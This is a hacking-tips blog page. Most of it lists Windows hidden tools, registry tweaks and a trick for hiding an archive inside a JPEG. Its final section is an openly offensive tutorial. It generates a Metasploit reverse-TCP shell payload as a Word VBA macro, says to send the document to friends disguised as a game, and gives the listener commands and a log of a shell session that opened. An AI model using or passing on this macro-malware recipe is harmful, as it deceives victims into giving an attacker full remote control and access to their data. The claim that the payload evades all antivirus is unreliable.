welcome

Have a new tricks fun of world!
Showing posts with label windows hacking. Show all posts
Showing posts with label windows hacking. Show all posts

Wednesday, 20 June 2012

25 Windows Hidden Tools You Seldom Use





To run any of these apps go to Start > Run and type the executable name and press Enter.
Character Map (charmap.exe) - Very useful for finding unusual characters.
Disk Cleanup (cleanmgr.exe) – The usual Disc cleanup.
Clipboard Viewer (clipbrd.exe) - Views contents of Windows clipboard.
Dr Watson (drwtsn32.exe) - Troubleshooting tool,runs when windows crashes.
DirectX diagnosis (dxdiag.exe) - Diagnose & test DirectX, video & sound cards.
Private character editor (eudcedit.exe) - Allows creation or modification of characters.
IExpress Wizard (iexpress.exe) - Create self-extracting / self-installing package.
Microsoft Synchronization Manager (mobsync.exe) - Appears to allow synchronization of
files on the network for when working offline. Apparently undocumented.
Windows Media Player 5.1(mplay32.exe) - Retro version of Media Player, very basic.
ODBC Data Source Administrator (odbcad32.exe) – Database connection utility for support
with external servers,create ODBC data sources,to administer remote databases or for
supporting the ODBC database utility in Visual basic language.
Object Packager (packager.exe) - To do with packaging objects for insertion in files, appears
to have comprehensive help files.
System Monitor (perfmon.exe) - Very useful, highly configurable tool, tells you everything
you ever wanted to know about any aspect of PC performance, for budding uber-geeks only.
Program Manager (progman.exe) - Legacy Windows 3.x desktop shell.
Remote Access phone book (rasphone.exe) - Documentation is virtually non-existent.
Registry Editor (regedt32.exe or regedit.exe) – For making custom changes or hacking the
Windows Registry.
Network shared folder wizard (shrpubw.exe) - Creates shared folders on network.
File signature verification tool (sigverif.exe) - This tool will search the operating system and
identify any unsigned device drivers installed on the system. It will also verify all signed
device drivers.
Volume Control (sndvol32.exe) - I've included this for those people that lose it from the
System Notification area.
System Configuration Editor (sysedit.exe) - Modify System.ini & Win.ini just like in Win98!
.
Syskey (syskey.exe) - Secures XP Account database, use with care, it's virtually
undocumented but it appears to encrypt all passwords, I'm not sure of the full implications.
Microsoft Telnet Client (telnet.exe) – Built in telnet client which can be used to connect to
servers to sent emails or to hack :) This is disabled in in vista but you can re-enable it by
going to
Control panel –> Programs and Features –> Click "Turn Windows features on or off" on left
–> Scroll down and check "Telnet Client.
Driver Verifier Manager (verifier.exe) - Seems to be a utility for monitoring the actions of
drivers, might be useful for people having driver problems. Undocumented.
Windows for Workgroups Chat (winchat.exe) - Appears to be an old NT utility to allow chat
sessions over a LAN, help files available.
System configuration (msconfig.exe) - Can use to control startup programs, make changes to
startup of XP.
Group Policy Editor (gpedit.msc) - Used to manage group policies, and permissions.Its an
Administrator only tool.
35

How to bypass Windows Administrator Password




This post is about an interesting hack to bypass the login passwords in Windows.
Application of this hack will result in Windows logging you on everytime as a certain user
( Please do remember at this point that this trick is useful if you are the sole user of your
computer. ) Follow the steps mentioned below to apply this trick

_ Click Start -> Run.

_ Type Control userpasswords2

_ Press Enter.

_ Click to uncheck the box labelled ‘ Users must enter a user name and password to
use this computer’.
_ Press OK.



Disable Writing to USB Drives
A major concern at organizations is allowing users to plug in a usb flash drive, because they could so
easily copy corporate data. Since Windows XP SP2, you can disable writing to USB devices
altogether using a simple registry hack. However one should also note that if you are using
this trick, you should make sure that the users are not administrators on the computer, because
they could easily change this setting back.


Here it is:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001


Paste the code into a notepad file,and then save it as a registry file(file.reg).
Double click it and voila,you have successfully prevented the write access to the USB drive.
Once you have double clicked the registry, you will have to reboot for the changes to take
effect. This works on Windows Vista as well. Here's the window you'll get when you try and
write to a USB drive:
If you want to enable the write access again,then copy this code and paste the code into a
notepad file,and then save it as a registry file.Double click it and write access will be enabled
again.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000'


Block all startup Viruses with help of msconfig


Open Run-> type msconfig and select startup tab. Select _ Disable all -> Apply

Hide your files in jpeg File without any Software





You will only need to download WinRAR. You just need to have a little knowledge about
Command Prompt and have WinRAR installed.


1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in
C:\hidden - RECOMMENDED).


2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the
same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in
C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working
directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now,
logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and
output.jpg is the file which contains both. :D

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it
(double-click) and it will show the picture you wanted to show. Now try opening the
same file with WinRAR, it will show the hidden archive...

This hack will allow you to hide files in jpegs's without software installed.

Video URL: http://thesecretofhacking.com/vd/ch3/cs4

Create Undectable Macro Virus for Windows OS*





We use Metasploit Linux version to create virus or handle all remote connections.
Download Link: www.metasploit.com
Action: When any user runs the word file, we get command prompt with full administrative
rights to format any drive, copy personal information.


Requirement:
1. Linux Machine (To generate virus and to listen connections)

2. Windows Machine (To embedd VBA code into word file)

Type following commands at Linux shell prompt:
# cd Desktop
# cd framework32
# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=4444 V>/root/vbvirus.txt

Note:

LHOST=192.168.1.8 is our linux machine ip address.
LPORT=4444 is a local port for communication.

Just copy vbvirus.txt file in pen drive and goto another windows system where office 2003
installed. after we open MS WORD 2003 and select tools options_ select Macro_select
Visual basic editor

After select File menu_ Import file_ select Vbvirus.txt
Save the file and exit and send to ur friends. Say this is good macro game.



To handle Windows command prompt at Linux side:

Open Linux Shell prompt and type following commands:
# cd Desktop
# cd framework32
#./msfconsole
_ use exploit/multi/handler
> set payload windows/shell/reverse_tcp
> set LHOST 192.168.1.8
> set LPORT 4444
> set exitonsession TRUE
>exploit
Linux is ready to accept windows command prompt for remote control any system.

Advantage:
Fully undetectable for all anti virus’s.


POC:
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.139:4444 -> 192.168.1.8:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32


Video URL: http://thesecretofhacking.com/vd/ch3/cs3